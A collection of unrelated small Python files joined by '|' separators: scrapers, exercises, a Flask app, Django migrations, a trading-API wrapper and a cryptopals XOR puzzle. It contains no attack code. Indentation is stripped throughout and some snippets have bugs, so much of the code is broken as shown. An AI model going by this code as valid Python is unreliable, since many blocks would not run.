'''
'''
for p in xrange(len(pro)):
print pro[p]
if os.path.exists('../loc/'+pro[p]):
shutil.rmtree('../loc/'+pro[p])
os.mkdir('../loc/'+pro[p])
os.mkdir('../loc/'+pro[p]+'/dis/')
for i in xrange(len(ref)):
temp = 0
for k in xrange(len(ref[i])):
temp += (new[p][k] - ref[i][k]) * (new[p][k] - ref[i][k])
dis.append([temp,refpro[i],i])
dis.sort()
x = []
for i in xrange(20):
x.append(i)
with open('../loc/'+pro[p]+'/simcity.txt','w') as w:
for i in xrange(len(pro)):
#print dis[i][1]
plot1 = pl.plot(x,ref[dis[i][2]],'r*-',label='reference')
plot2 = pl.plot(x,new[p],'b*-',label='input')
pl.title('Probility in terms of interest')
pl.xlabel('interests')
pl.ylabel('probility')
pl.xlim(0,10)
pl.ylim(0,1)
pl.legend()
pl.savefig('../loc/'+pro[p]+'/dis/' + str(dis[i][1]) + '.jpg')
pl.close()
w.write(str(dis[i][1]) + '\n')
dis = []
x = []
'''
|
# --*--coding: utf-8--*--
# @Time: 2021/2/15
# @Author: Leander
# @File: 06 守护线程
# from threading import Thread
# import time
#
# def task(name):
# print(f'{name} is running')
# time.sleep(1)
# print(f'{name} is over')
#
# if __name__ == '__main__':
# t = Thread(target=task, args=('egon',))
# t.daemon = True
# t.start()
# print('主')
"""
主线程运行结束之后不会立刻结束,会等待所有其他非守护子线程结束才会结束
因为主线程结束意味着所在的进程的结束
"""
# 稍微有一点迷惑性的例子
from threading import Thread
import time
def foo():
print(123)
time.sleep(1)
print('end123')
def func():
print(456)
time.sleep(3)
print('end456')
if __name__ == '__main__':
t1 = Thread(target=foo)
t2 = Thread(target=func)
t1.daemon = True
t1.start()
t2.start()
print('主') |
# device only changes the color when the slide switch is in the ON position
import time
import board
import neopixel
from digitalio import DigitalInOut, Direction, Pull
pixels = neopixel.NeoPixel(board.NEOPIXEL, 10)
button_a = DigitalInOut(board.BUTTON_A)
button_a.direction = Direction.INPUT
button_a.pull = Pull.DOWN
buttona_pre = button_a.value
button_b = DigitalInOut(board.BUTTON_B)
button_b.direction = Direction.INPUT
button_b.pull = Pull.DOWN
buttonb_pre = button_b.value
switch = DigitalInOut(board.SLIDE_SWITCH)
switch.direction = Direction.INPUT
switch.pull = Pull.UP
switch_off = switch.value
ORANGE = (255, 128, 0)
BLUE = (0, 0, 255)
color = BLUE
while True:
if switch.value != switch_off:
if button_a.value != buttona_pre:
buttona_pre = button_a.value
if button_a.value:
color = ORANGE
if button_b.value != buttonb_pre:
buttonb_pre = button_b.value
if button_b.value:
color = BLUE
pixels.fill(color)
else:
pixels.fill(0)
|
import externalapi
def compute(x, y):
xx = externalapi.remote_compute(x)
yy = externalapi.remote_compute(y)
result = (xx+yy) ** 0.5
return result
|
from urllib.request import Request, urlopen
from bs4 import BeautifulSoup
import pandas as pd
req = Request('https://www.bauruempregos.com.br/home/vagas', headers={'User-Agent': 'Mozilla/5.0'})
html = urlopen(req)#.read()
#html=urlopen('https://www.bauruempregos.com.br/home/vagas') nao funciona ocorre erro 403
#print(html.read())
soup=BeautifulSoup(html.read(),'html.parser')
vagas=soup.find_all("div", class_=["vaga","data-vagas"])
datas={}
dictname=""
for item in vagas:
#print(item)
if item.a: #verifica se a existe dentro da div se existir nao é o nome da vaga
nomevaga=str(item.a.string).strip()
if "[ANÚNCIO ENCERRADO]" not in nomevaga:
#vagas.pop(item)
print(nomevaga)
datas[dictname].append(nomevaga)
#else:
# print (nomevaga)
else:
print("\n ---------------------------\n")
print(f"ITENS DO DIA {item.string} ")
print("\n ---------------------------\n")
dictname=item.string
datas[dictname]=[]
#Filtra todos os anuncios que estao encerrados ^
print(datas)
print("----------")
print(datas['31/07/2021'])
#else:
# print(nomevaga)
# print("mudar aqui")
#import csv
#arquivo=open("bauruempregos.csv","w")
#arquivo.close()
final_data=[]
for dia,vagas in datas.items():
for vaga in vagas:
final_data.append([vaga,dia])
data_frame = pd.DataFrame.from_dict(final_data)
data_frame.to_csv (r'dados.csv', index = False, header=False)
|
import subprocess
import os
ssh = input("Enter your SSH key name: ")
userName = input("Enter your github username: ")
email = input("Enter your github email: ")
#repo = input("Paste in the github repo that you are working on (with owner name!): ")
repo = ""
with open("remote_origin_url.txt", "w") as file:
#create the file
subprocess.run(["git", "config", "--get", "remote.origin.url"], stdout = file)
url_file = open("remote_origin_url.txt", "r")
if url_file.mode == 'r':
url = url_file.read()
if "https://" in url:
githubSubstring = "https://github.com/"
repo = url[len(githubSubstring)::]
else:
repo = url[url.find(':') + 1::]
repo = repo.rstrip("\n")
fullString = "git@github-" + ssh + ":" + repo
subprocess.run(["git", "remote", "set-url", "origin", fullString])
subprocess.run(["git", "config", "--replace-all", "user.name", userName])
subprocess.run(["git", "config", "--global", "--replace-all", "user.name", userName])
subprocess.run(["git", "config", "--replace-all", "user.email", email])
subprocess.run(["git", "config", "--global", "--replace-all", "user.email", email])
subprocess.run(["git", "remote", "-v"]) |
import sys
def compareX(elem):
return elem[0]
pos = []
# Read in data
f = open('./input.txt')
for idx, line in enumerate(f):
line = line.rstrip('\n')
# print(line)
if idx == 0:
N = int(line)
else:
x, y = line.split()
pos.append([int(x), int(y)])
# print (pos)
visit = [1] * N
results = []
for i in range(N):
# if visit[i] == 0:
# continue
x1 = pos[i][0]
y1 = pos[i][1]
for j in range(N):
# if i == j:
# break
x2 = pos[j][0]
y2 = pos[j][1]
if x2>x1 and y2>y1:
# print ('I am here')
visit[i] = 0
break
if visit[i] == 1:
results.append([pos[i][0], pos[i][1]])
# for i in range(N):
# if visit[i] == 1:
# print (pos[i][0], pos[i][1])
results.sort(key=compareX)
for r in results:
print (r[0], r[1])
f.close() |
from django.contrib import admin
from .models.user import User
from .models.account import Account
admin.site.register(User)
admin.site.register(Account) |
# Copyright 2015 Ericsson AB
# Copyright (c) 2015 Gigamon
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Initial schema operations for Tap-as-a-Service service plugin
from alembic import op
import sqlalchemy as sa
direction_types = sa.Enum('IN', 'OUT', 'BOTH', name='tapflows_direction')
def upgrade():
op.create_table(
'tap_services',
sa.Column('id', sa.String(length=36), primary_key=True,
nullable=False),
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('description', sa.String(length=1024), nullable=True),
sa.Column('port_id', sa.String(36), nullable=False),
sa.Column('network_id', sa.String(36), nullable=True))
op.create_table(
'tap_flows',
sa.Column('id', sa.String(length=36), primary_key=True,
nullable=False),
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('description', sa.String(length=1024), nullable=True),
sa.Column('tap_service_id', sa.String(length=36),
sa.ForeignKey("tap_services.id",
ondelete="CASCADE"), nullable=False),
sa.Column('source_port', sa.String(length=36), nullable=False),
sa.Column('direction', direction_types, nullable=False))
op.create_table(
'tap_id_associations',
sa.Column('tap_service_id', sa.String(length=36)),
sa.Column('taas_id', sa.INTEGER, primary_key=True, autoincrement=True))
|
import os
from flask import jsonify
from flask import Flask, render_template, request
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
app = Flask(__name__)
DATABASE_URL = 'sqlite:///C:/sqlitedatabase/test1.db';
engine = create_engine((DATABASE_URL))
db = scoped_session(sessionmaker(bind=engine))
@app.route("/")
def index():
flights = db.execute("SELECT * FROM flights").fetchall()
return render_template("home.html", flights=flights)
@app.route("/flightbooking")
def flightbooking():
flights1 = db.execute("SELECT * FROM flights").fetchall()
return render_template("booking.html", flights1 = flights1)
@app.route("/book", methods=['POST'])
def book():
"""Book Flight"""
name = request.form.get("name")
try:
flight_id = int(request.form.get("flight_id"))
except ValueError:
return render_template("error.html", message="Invalid Flight Number")
if db.execute("SELECT * FROM flights WHERE id=:id", {"id":flight_id}).rowcount ==0:
return render_template("error.html", message='No Such Flight with this Id')
db.execute("INSERT INTO passengers(name, flight_id) VALUES(:name, :flight_id)",
{'name':name, 'flight_id':flight_id})
db.commit()
return render_template("success.html")
@app.route('/flights')
def flights():
""" List of all flights"""
flights = db.execute("SELECT * FROM flights").fetchall()
return render_template("flights.html", flights=flights)
@app.route('/flights/<int:flight_id>')
def flight(flight_id):
""" List Details about single flight"""
flight = db.execute("SELECT * FROM flights WHERE id =:id",{'id':flight_id}).fetchone()
if flight is None:
return render_template("error.html", message='No such flight')
passengers = db.execute("SELECT name FROM passengers WHERE flight_id= :flight_id",
{"flight_id": flight_id}).fetchall()
return render_template("flightdetail.html", flight=flight, passengers=passengers)
@app.route("/api/flights/<int:flight_id>")
def flight_api(flight_id):
"""Return Detail about a single flight"""
# make sure flight exists.
flight = db.execute("SELECT * FROM flights WHERE id =:id", {'id': flight_id}).fetchone()
if flight is None:
return jsonify({"error": "Invalid flight_id"}), 422
# Get all passengers
passengers = db.execute("SELECT name FROM passengers WHERE flight_id= :flight_id",
{"flight_id": flight_id}).fetchall()
names=[]
for passenger in passengers:
names.append(passenger.name)
data = {
"origin": flight.origin,
"destination":flight.destination,
"duration": flight.duration,
"passengers": names
}
return jsonify(data)
|
import pickle
import numpy as np
from nn import NN
from image import pre_process, augment
import tensorflow as tf
import itertools
import time
from sklearn.utils import shuffle
import pandas as pd
import cv2
training_file = "data/train.p"
validation_file = "data/valid.p"
testing_file = "data/test.p"
with open(training_file, mode='rb') as f:
train = pickle.load(f)
with open(validation_file, mode='rb') as f:
valid = pickle.load(f)
with open(testing_file, mode='rb') as f:
test = pickle.load(f)
X_train, y_train = train['features'], train['labels']
X_valid, y_valid = valid['features'], valid['labels']
X_test, y_test = test['features'], test['labels']
aug_X, aug_y = augment(X_train, y_train)
aug_X, aug_y = shuffle(aug_X, aug_y)
X_train = pre_process(X_train)
X_valid = pre_process(X_valid)
X_test = pre_process(X_test)
aug_X = pre_process(aug_X)
# Hyperparameters we will iterate over for experiments
data_augmentation = [str(True), str(False)]
batch_sizes = [32, 64, 128]
dropout_keep_prob = [0.4, 0.5, 0.6]
config = [0, 1]
filters = [[16, 32], [32, 64], [64, 128]]
ksize = [[1, 1], [2, 2], [3, 3], [4, 4]]
def create_network_config(index, filters, ksize):
network_configurations = [
[
{ 'type': 'conv', 'filters': filters[0], 'ksize': ksize, 'stride': [1, 1] },
{ 'type': 'max_pool', 'ksize': [2, 2], 'stride': [2, 2] },
{ 'type': 'relu' },
{ 'type': 'conv', 'filters': filters[1], 'ksize': ksize, 'stride': [1, 1] },
{ 'type': 'max_pool', 'ksize': [2, 2], 'stride': [2, 2] },
{ 'type': 'relu' },
{ 'type': 'flatten' },
{ 'type': 'fc', 'units': 128 },
{ 'type': 'dropout' },
{ 'type': 'relu' },
{ 'type': 'fc', 'units': 43 }
],
[
{ 'type': 'conv', 'filters': filters[0], 'ksize': ksize, 'stride': [1, 1] },
{ 'type': 'relu' },
{ 'type': 'max_pool', 'ksize': [2, 2], 'stride': [2, 2] },
{ 'type': 'flatten' },
{ 'type': 'fc', 'units': 128 },
{ 'type': 'dropout' },
{ 'type': 'relu' },
{ 'type': 'fc', 'units': 43 }
]
]
return network_configurations[index]
hyperparameters = [data_augmentation, batch_sizes, dropout_keep_prob, filters, ksize, config]
# Get every permutation of hyperparameters
experiments = list(itertools.product(*hyperparameters))
input_size = X_train[0].shape
num_labels = max(y_train) + 1
# stats will contain the statistics from the experiments that are ran
# hyperparameters, total time, accuracy
stats = pd.read_csv('experiment_stats.csv')
stat_labels = [
'elapsed_time_to_train',
'validation_accuracy',
'data_augmented',
'batch_size',
'dropout_keep_probability',
'conv_filters',
'conv_ksize',
'architecture'
]
tf.logging.set_verbosity(tf.logging.ERROR)
# seeding the shuffle in case the computer crashes and we need to restart from where we left off
experiments = shuffle(experiments, random_state=99)
experiments = experiments[400:]
print("{} experiments about to run.".format(len(experiments)))
for experiment in experiments:
augment, batch_size, keep_prob, filters, ksize, config = experiment
start_time = time.time()
network = NN(epochs=5, batch_size=batch_size, learning_rate=0.001)
features = np.concatenate([X_train, aug_X]) if augment == 'True' else X_train
labels = np.concatenate([y_train, aug_y]) if augment == 'True' else y_train
network.add_train_data(features, labels)
network.add_test_data(X_test, y_test)
network.add_validation_data(X_valid, y_valid)
network.add_configuration(create_network_config(config, filters, ksize), input_size=input_size)
network.build(num_labels=num_labels)
print("Training model with hyperparameters: augmented: {}, batch_size: {}, keep_prob: {}, filters: {}, ksize: {}, config: {}".format(augment, batch_size, keep_prob, filters, ksize, network.get_string()))
validation_accuracy = network.train(keep_prob=keep_prob)
end_time = time.time()
stat_values = [end_time - start_time, validation_accuracy, augment, batch_size, keep_prob, filters, ksize, network.get_string()]
stat_entry = pd.Series(stat_values, index=stat_labels)
stats = stats.append(stat_entry, ignore_index=True)
stats.to_csv('experiment_stats.csv', index = None, header=True)
|
from AudioFileManager import *
import numpy as np
sequenceLength = 4775*2
nSnippets = 256
minEpoch = 61000
nEpochs = 800
epochStep = 10
snippetsPerEpoch = 5
nOverlays = 1
nRepeats = 4
def GetSequence():
output = np.zeros(sequenceLength*nSnippets*nRepeats)
for i in range(nSnippets):
epoch = minEpoch + np.random.randint(0, nEpochs)*epochStep
k = np.random.randint(0, snippetsPerEpoch)
for j in range(nRepeats):
rate, audio = ReadWavAsMono("GANOutputs/normalized{}.{}.wav".format(epoch, k))
output[i*nRepeats*sequenceLength+j*sequenceLength:i*nRepeats*sequenceLength+j*sequenceLength+sequenceLength] = audio[0:sequenceLength]
return output
output = np.zeros(sequenceLength*nSnippets*nRepeats)
for i in range(nOverlays):
offset = sequenceLength * i
output[offset:-1] = output[offset:-1] + GetSequence()[offset:-1]/nOverlays
WriteMonoWav("randomSequence.wav", output, 8000)
|
from suds.client import Client
import re
import urllib2
import json
common_words = ['i','you','no','yes','the','it','a',"it's",'its','on','and','my','your','in',"you're","i'm",'is','was','but','what','had','oh','for',
'yeah','yea','me','na','all','to','do','be','this','gonna','know','of','come','like','so','way','just','said','would','now','we','that',
'got','when','dont','im','are','id']
# Returns list of lyrics split into words
def getLyrics(artist,name):
url = "http://lyrics.wikia.com/server.php?wsdl"
client = Client(url)
if artist and name:
resp = client.service.getSong(artist=artist,song=name)
if "Not found" not in resp.lyrics:
lyrics = resp.lyrics
lyrics = re.sub(r'[\(\)\,\.\?\!\"|\[.{0,2}\]|(x\d)]',"",lyrics)
return lyrics.split()
return None
# Returns dict of artist/song combos for specified year
def getYear(year,bbkey):
url = "http://api.billboard.com/apisvc/chart/v1/list?id=379&format=json&count=50&sdate=" + year + "-01-01&edate=" + year + "-12-31&api_key=" + bbkey
req = urllib2.Request(url)
doc = urllib2.urlopen(req)
content = str(doc.read())
songMap = dict()
jsobj = json.loads(content)
if jsobj:
results = jsobj["searchResults"]
for entry in results["chartItem"]:
name = entry["song"]
artist = entry["artist"]
if name and artist:
print(artist + ' - ' + name)
try:
if name not in songMap[artist]:
songMap[artist].append(name)
except KeyError:
songMap[artist] = [name]
return songMap
else:
return None
# Build frequency table of words
def buildFreqTable(songlist):
freqTable = dict()
for song in songlist:
for lyric in song:
if lyric:
lyric = lyric.lower().encode("utf-8")
if lyric not in common_words:
if lyric in freqTable:
freqTable[lyric] += 1
else:
freqTable[lyric] = 1
return freqTable
|
from L8.board.board import Board
class TicTacToeBoard(Board):
def __init__(self):
super().__init__()
self.init_board()
def init_board(self):
# Initialize a 3x3 board with no tokens
self.current_state = [
[None, None, None] for _ in range(3)
]
def __str__(self) -> str:
"""
This will give us a board formatted like this:
X | O | X
X | X | O
X | O | O
:return: a str representation of the current board
"""
representation = "\n".join(
"|".join(["{:^3}".format(str(val)) if val is not None
else "{:3}".format("") for val in row]) for row in self.current_state)
return representation
|
class Node:
def __init__(self, data=None, next=None):
self.data = data
self.next = next
def __str__(self):
return str(self.data)
def print_node(node):
print node
def traverse(node, visit):
print "List:"
while node:
visit(node)
node = node.next
def remove_head(node):
if node is None:
raise ValueError
return node.next, node.data
def remove_tail(node):
head = node
if node is None:
raise ValueError
if node.next is None:
return None, node.data
while node.next.next:
node = node.next
output = node.next.data
node.next = None
return head, output
head1 = None
head1 = Node(1, head1)
head1 = Node(2, head1)
head1 = Node(3, head1)
head1 = Node(4, head1)
head1 = Node(5, head1)
head1 = Node(6, head1)
traverse(head1, print_node)
head1, data = remove_tail(head1)
traverse(head1, print_node)
head1, data = remove_tail(head1)
traverse(head1, print_node)
head1, data = remove_head(head1)
traverse(head1, print_node)
head1, data = remove_head(head1)
traverse(head1, print_node)
|
# -*- coding: utf-8 -*-
import numpy as np
from hypertools.tools.normalize import normalize
from hypertools.plot.plot import plot
cluster1 = np.random.multivariate_normal(np.zeros(3), np.eye(3), size=100)
cluster2 = np.random.multivariate_normal(np.zeros(3)+100, np.eye(3), size=100)
data = [cluster1, cluster2]
def test_normalize_returns_list():
assert type(normalize(data)) is list
def test_normalize_across():
norm_data = normalize(data, normalize='across')
assert np.allclose(np.mean(np.vstack(norm_data),axis=0),0)
def test_normalize_within():
norm_data = normalize(data, normalize='within')
assert np.allclose([np.mean(i,axis=0) for i in norm_data],0)
def test_normalize_row():
norm_data = normalize(data, normalize='row')
assert np.allclose(np.mean(np.vstack(norm_data), axis=1),0)
def test_normalize_geo():
geo = plot(data, show=False)
norm_data = normalize(geo, normalize='row')
assert np.allclose(np.mean(np.vstack(norm_data), axis=1),0)
|
names = ['Joe', 'Kim', 'Jane', 'Bob', 'Kim']
print(names) # ['Joe', 'Kim', 'Jane', 'Bob', 'Kim']
print(names.remove('Kim')) # None
print(names) # ['Joe', 'Jane', 'Bob', 'Kim']
print(names.remove('George'))
# Traceback (most recent call last):
# File "examples/lists/remove.py", line 9, in <module>
# print(names.remove('George')) # None
# ValueError: list.remove(x): x not in list
|
class Solution:
# @return a string
def convert(self, s, nRows):
result = ''
if nRows == 1:
return s
interval = 2 * (nRows - 1)
times, remainder = divmod(len(s), interval)
for i in range(nRows):
if i == 0 or i == nRows - 1:
for j in range(times):
result += s[i+interval*j]
if i <= remainder-1:
result += s[i+interval*times]
else:
for j in range(times):
result += s[i+interval*j]
result += s[interval-i+interval*j]
if i<=remainder-1:
result += s[i+interval*times]
if interval-i<=remainder-1:
result += s[interval-i+interval*times]
return result
if __name__ == '__main__':
test = Solution()
print test.convert('ABC', 3)
raw_input() |
import sys
from collections import defaultdict
from itertools import count
class Trie(object):
def __init__(self, words):
self._node_counter = count(0)
self._root = next(self._node_counter)
self._trie = defaultdict(list)
self._add_words_to_trie(words)
def _add_words_to_trie(self, words):
for word in words:
self._add_to_trie(word)
self._trie = dict(self._trie)
def _add_to_trie(self, word):
current_node = self._root
for letter in word:
node = self._get_neighbour_with_given_label(current_node, letter)
if node is not None:
current_node = node
else:
next_node = next(self._node_counter)
self._trie[current_node].append((next_node, letter))
current_node = next_node
def _get_neighbour_with_given_label(self, current_node, letter):
neighbours = self._trie[current_node]
for node, label in neighbours:
if label == letter:
return node
def _is_leaf(self, node):
return node not in self._trie
def does_text_match_with_pattern(self, text):
current_node = self._root
for letter in text:
next_node = self._get_neighbour_with_given_label(current_node, letter)
if next_node is None:
return False
if self._is_leaf(next_node):
return True
current_node = next_node
return False
def multiple_pattern_matching(text, patterns):
text_length = len(text)
trie = Trie(patterns)
indices = []
for ix in range(text_length):
if trie.does_text_match_with_pattern(text[ix:]):
indices.append(ix)
return indices
def main():
data = sys.stdin.read().splitlines()
text = data[0]
n = int(data[1])
patterns = data[2:2+n]
indices_of_matching_patterns = multiple_pattern_matching(text, patterns)
print(" ".join([str(elem) for elem in indices_of_matching_patterns]))
if __name__ == "__main__":
main()
|
from pox.core import core
import pox.openflow.libopenflow_01 as of
import pox.openflow.nicira as nx
from utils import *
import time
from pox.lib.addresses import EthAddr, IPAddr
from pox.lib.packet.lldp import lldp, chassis_id, port_id, ttl, end_tlv
from pox.lib.packet.ethernet import ethernet
from pox.lib.packet.arp import arp
from pox.lib.packet.ipv4 import ipv4
from pox.lib.packet.icmp import echo, unreach, icmp
import struct
CONFIG_FILENAME = '/home/mininet/config'
|
# -*- coding: cp936 -*-
import random as r
class Fish:
def _init_(self):
self.x = r.randint(0,10)
self.y = r.randint(0,10)
def move(self):
self.x -=1
print ("我的位置是",self.x,self.y)
class Godfish(Fish):
pass
class crap(Fish):
pass
class Salmon(Fish):
pass
class Shark(Fish):
def _init_(self):
self.hungry = True
def eat(self):
if self.hungry:
print("吃货的梦想")
self.hungry = False
else:
print("太撑了,吃不下")
|
from django.conf.urls import patterns, include, url
from django.views.generic import RedirectView
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
url(
r'^games/tic-tac-toe/',
include('apps.tic_tac_toe.urls', namespace='tic_tac_toe'),
),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
)
urlpatterns += patterns('',
(r'^$', RedirectView.as_view(url='/games/tic-tac-toe/')),
)
|
import cx_Oracle
class connect:
def getConnection(self):
try:
connection = cx_Oracle.connect('')
#print "Connected to domain successfully"
return connection
except:
print "There was an error while connecting to domain!"
#cur.execute('select * from prsnl p where p.name_full_formatted = \'Boregowda , Sachin\'')
def disconnect(self,connection,cursor):
cursor.close()
connection.close()
#print "Connection to database was successfully closed!"
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import urllib2
import utils.gmtTimeUtil as gmtTimeUtil
from yunbi.client import Client, get_api_path
from yunbi.conf import ACCESS_KEY, SECRET_KEY
import sys
reload(sys)
sys.setdefaultencoding('utf8')
class YunUtil():
def __init__(self):
# self.access_key = access_key
self.client = Client(access_key=ACCESS_KEY, secret_key=SECRET_KEY)
# print "yunUtil.init()"
def getMebersInfo(self):
try:
yun_info = self.client.get(get_api_path('members'))
return yun_info
except Exception, e:
print e
return None
# 获取yun剩余zec
def getCurrency(self, coin):
yun_info = self.client.get(get_api_path('members'))
# print yun_info
# cny, zec, eth = 0, 0, 0
balance = 0.0
accounts = yun_info['accounts']
for account in accounts:
if account['currency'] == coin:
balance = float(account['balance'])
return balance
# 获取我的挂单数
def getMyOrderCount(self, coin):
orders = self.client.get(get_api_path('orders'), {'market': coin+'cny'})
# print orders
count = 0
off_sec = 0
for order in orders :
if order['state'] == 'wait' :
count = count + 1
created_at = order['created_at']
# print "gmt_tm--->"+created_at
off_sec = gmtTimeUtil.get_off_by_utc_str(created_at)
# print "off_sec--->%d" % off_sec
# 如果超过 10分钟,提醒手动处理
if off_sec > 600 :
return 600
return count
# 获取yun有效卖价和数量 asks 卖的数量:remaining_volume 卖的价格:price bids 买
def getMarketInfo(self, buyOrSell, coin, max_volume, min_volume):
order_book = self.client.get(get_api_path('order_book'), params={'market': coin+'cny'})
# print order_book
side = ''
if 'buy' == buyOrSell :
side = 'bids'
if 'sell' == buyOrSell :
side = 'asks'
asks = order_book[side]
for ask_order in asks:
remaining_volume = float(ask_order['remaining_volume'])
price = float(ask_order['price'])
# print u"卖出 --> 价格:%s 数量:%s " %(price, remaining_volume)
#交易量限制
if remaining_volume >= min_volume:
if remaining_volume > max_volume :
remaining_volume = max_volume
return remaining_volume, price
return 0.0, 0.0
#创建订单
#sell 10 dogecoins at price 0.01
# params = {'market': 'dogcny', 'side': 'sell', 'volume': 10, 'price': 0.01}
# res = client.post(get_api_path('orders'), params)
def createOrder(self, coin, buyOrSell, price, volume):
# print coin, buyOrSell, price, volume
try :
params = {'market': coin+'cny', 'side': buyOrSell, 'volume': volume, 'price': price}
res = self.client.post(get_api_path('orders'), params)
# print 'res', res
if res and res['id'] > 1 :
return res['id']
except Exception, e :
print e
return 0
#取消所有订单
def clearOrder(self):
res = self.client.post(get_api_path('clear'))
# print res
return res
if __name__ == '__main__':
print u"---", "====="
# 取参数
# path = get_api_path('members')
# signature, query = YunUtil().client.auth.sign_params('GET',path, None)
# print "signature--->%s" %( signature )
# print "query--->%s" %( query )
# get member info
# print u'云币网账户信息: %d(cny)' % (YunUtil().getCurrency('cny'))
# print "最少交易量:%f" % (min_operate_num)
# remaining_volume, price = YunUtil().getMarketInfo('sell', 'eth', 20, 1)
# print '有效价格:%f 有效数量:%f ' % (price, remaining_volume)
# print u'云币网账户信息: %s(cny)' % (YunUtil().getMyOrderCount('zec'))
# print time.strftime("%Y-%m-%d %H:%M:%S", time.time())
# print u'创建订单: %s' % (YunUtil().createOrder('zec', 'buy', 100, 1.00))
# print u'创建订单: %s' % (YunUtil().createOrder('eos', 'sell', 14, 1.00))
YunUtil().clearOrder()
|
from datetime import date
atual = date.today().year
ano = int(input('informe o ano de nascimento: '))
idade = atual - ano
if idade < 18:
tempo = 18 - idade
print('ainda não está no tempo de se alistar!\nvalta {} ano(s)!'.format(tempo))
saldo = atual + tempo
print('Seu alistamento será em {}'.format(saldo))
elif idade > 18:
tempo = idade - 18
print('ja passol do tempo!\n{} ano(s) se passol'.format(tempo))
saldo = atual - tempo
print('Seu alistamento foi em {}'.format(saldo))
else:
print('está na hora!!!')
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 12 20:26:26 2016
@author: rossm
Introduction to Computation and Programming Using Python
Finger Exercise 3.2
Summing Input Strings
"""
counter = 0
sum = 0
reals = [1.23,2.4,3.123]
for n in range(3):
sum = sum + reals[counter]
counter = counter + 1
print sum |
# -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
#加载构建soup对象
soup = BeautifulSoup(open("index.html"),"lxml")
#备注:bs4通过soup对象直接操作标签:检查文档中是否包含这个标签
#如果要查询文档中的所有指定标签,请使用DOM查询
#1.获取标签对象
#title标签
print(soup.title) #<title>Xpath测试</title>
#2.操作标签的属性
print ('-*-'*10)
print(soup.h1.attrs)
print(soup.h1.attrs["id"])
print(soup.h1.attrs.get("id")) #title
print(soup.p.attrs.get("class")) #None
#通过直接获取标签的方式,获取到匹配成功的第一个标签
print(soup.h2.attrs)#{'id': 'title2'}
#3.操作标签的内容--通过string的方式获取标签的字符串内容
print(soup.h2.string) #
|
#!/bin/python
def AllDigitsFound(d):
r=True
for b in d:
r = r and b
return r
def SplitDigits(n):
result=[]
while n != 0:
result.append(n%10)
n/=10
return result
def CountSheep(n):
digits=[False]*10
count = 1
while not AllDigitsFound(digits) and count < 100000:
num = n * count
numdigits = SplitDigits(num)
for d in numdigits:
digits[d]=True
# print digits
count+=1
if AllDigitsFound(digits):
return num
else:
return "INSOMNIA"
t = int(raw_input())
for i in xrange(1, t + 1):
n = int(raw_input())
if n == 0:
o = "INSOMNIA"
else:
o = CountSheep(n)
print "Case #{}: {}".format(i, o) |
from sys import path; path += [".", ".."] # hacky...
from utils import *
if __name__ == "__main__":
ciphertexts = map(dehex, load_data("4.txt").split("\n"))
keyspace = list(range(0x100))
plaintexts = reduce(op.add, [
[xor(ct, [key]) for key in keyspace]
for ct in ciphertexts
])
best_plaintext = min(plaintexts, key=englishness) # I like this code
message = best_plaintext.decode()
assert(message == "Now that the party is jumping\n")
print(message.strip())
|
# Generated by Django 3.0.3 on 2020-05-11 20:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('miscosas', '0002_auto_20200507_0013'),
]
operations = [
migrations.AddField(
model_name='alimentador',
name='puntuacion',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='alimentador',
name='tipo',
field=models.CharField(default='', max_length=10),
),
migrations.AlterField(
model_name='pagusuario',
name='foto',
field=models.TextField(default=''),
),
]
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
numList = []
currentNode1 = l1
currentNode2 = l2
while currentNode1:
numList.append(currentNode1.val)
currentNode1 = currentNode1.next
while currentNode2:
numList.append(currentNode2.val)
currentNode2 = currentNode2.next
numList.sort()
newNode = None
lastNewNode = None
for node in numList :
if newNode == None:
newNode = ListNode(node)
lastNewNode = newNode
else :
lastNewNode.next = ListNode(node)
lastNewNode = lastNewNode.next
return newNode
|
#Problem Statement: Perform table join by location of 2 shapefile
#Step 1: Load the shapefile
filepath="/home/abhishek/Desktop/M.Sc-GIS/data/natural_earth_vector/110m_cultural/ne_110m_populated_places.shp"
shp=QgsVectorLayer(filepath,"Pop","ogr")
QgsProject.instance().addMapLayer(shp)
filepath="/home/abhishek/Desktop/M.Sc-GIS/data/natural_earth_vector/10m_cultural/ne_10m_admin_0_countries.shp"
shp1=QgsVectorLayer(filepath,"countries","ogr")
QgsProject.instance().addMapLayer(shp1)
outpath="/home/abhishek/Desktop/joinloc.shp"
params={'INPUT':shp,'JOIN':shp1,'PREDICATE':[5],'JOIN_FIELDS':['SOVEREIGNT'],
'METHOD':0,'DISCARD_NONMATCHING':False,'OUTPUT':outpath}
processing.run("qgis:joinattributesbylocation",params)
|
#!/usr/bin/env python
import sys
import os
import csv
dir_name = sys.argv[1]
# get file list
file_list = []
for root, dirs , files in os.walk(dir_name, True):
for file in files:
file_list.append("%s/%s"%(root,file))
total_file_size = 0
# get total file size
for file in file_list:
file_size = os.path.getsize(file)
total_file_size += file_size
print total_file_size
|
ll=list(map(str,input().split()))
cc=0
for i in range(len(ll[0])):
if(ll[0][i]!=ll[1][i]):
c+=1
bb=int(ll[2])
if(c==bb):
print("yes")
else:
print("no")
|
from flask import Flask, render_template, request
import requests
import sys
import json
import datetime
API_key = "????" # create api key on https://openweathermap.org/api
app = Flask(__name__)
@app.route("/")
def index():
